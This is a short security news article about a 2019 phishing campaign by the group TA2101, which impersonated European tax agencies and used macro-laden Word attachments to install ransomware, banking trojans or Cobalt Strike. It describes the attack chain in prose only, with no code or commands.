15 November 2019

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

ProofPoint researchers uncovered a new phishing scheme that targets several businesses and organizations in Germany, Italy, and the United States in order to infect their networks with malware. The attacks are orchestrated by a relatively new hacking crew, tracked as TA2101, that appears to be interested in businesses, IT services, manufacturing, and healthcare industries.

The threat actor uses legitimate and licensed penetration testing tools and backdoor framework such as Cobalt Strike and Metasploit to perform the post-exploitation operation. The malware is delivered via spear-phishing emails purported to be from financial regulatory agencies.

Between October and November 2019, Proofpoint researchers observed several campaigns that used malicious email messages to infect organizations in Germany, Italy, and the United States with backdoor, banking Trojan, or ransomware malware. In all observed cases the attackers used malicious Word document attachments as an initial vector to compromise the device.

Once opened, the attachment executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs one of the malicious payloads (Maxe ransomware, IcedID trojan or Cobalt Strike backdoor) onto the victim’s system.

In addition to social engineering, the hackers are also using stolen branding and lookalike domains of European taxation agencies and other public-facing entities such as Internet service providers to make phishing emails look even more convincing. In the recent campaigns the phishing emails were observed to impersonate the following entities:

Bundeszentralamt fur Steuern, the German Federal Ministry of Finance,

Agenzia Delle Entrate, the Italian Revenue Agency,

1&1 Internet AG, a German internet service provider,

USPS, the United States Postal Service.

“The increasing sophistication of these lures mirrors improved social engineering and a focus on effectiveness over quantity appearing in many campaigns globally across the email threat landscape,” the researchers concluded.

The more detailed analysis, as well as Indicators of Compromise (IoCs) related to the recent campaigns, are available in ProofPoint blog post.

Back to the list

Latest Posts

TrickBot campaign lures new victims with annual bonuses

TrickBot campaign lures new victims with annual bonuses

The malware operators abuse Google Suite to deliver malicious payload.
10 December 2019
New Linux vulnerability allows hijacking VPN connections on Unix systems

New Linux vulnerability allows hijacking VPN connections on Unix systems

The flaw affects most Linux distros, as well as other Unix-like operating systems including FreeBSD, OpenBSD, macOS, iOS, and Android.
9 December 2019
North Korean hackers adopt a new technique to infect macOS machines

North Korean hackers adopt a new technique to infect macOS machines

The found sample appears to be the Lazarus group's first in-memory malware targeting the Apple operating system.
6 December 2019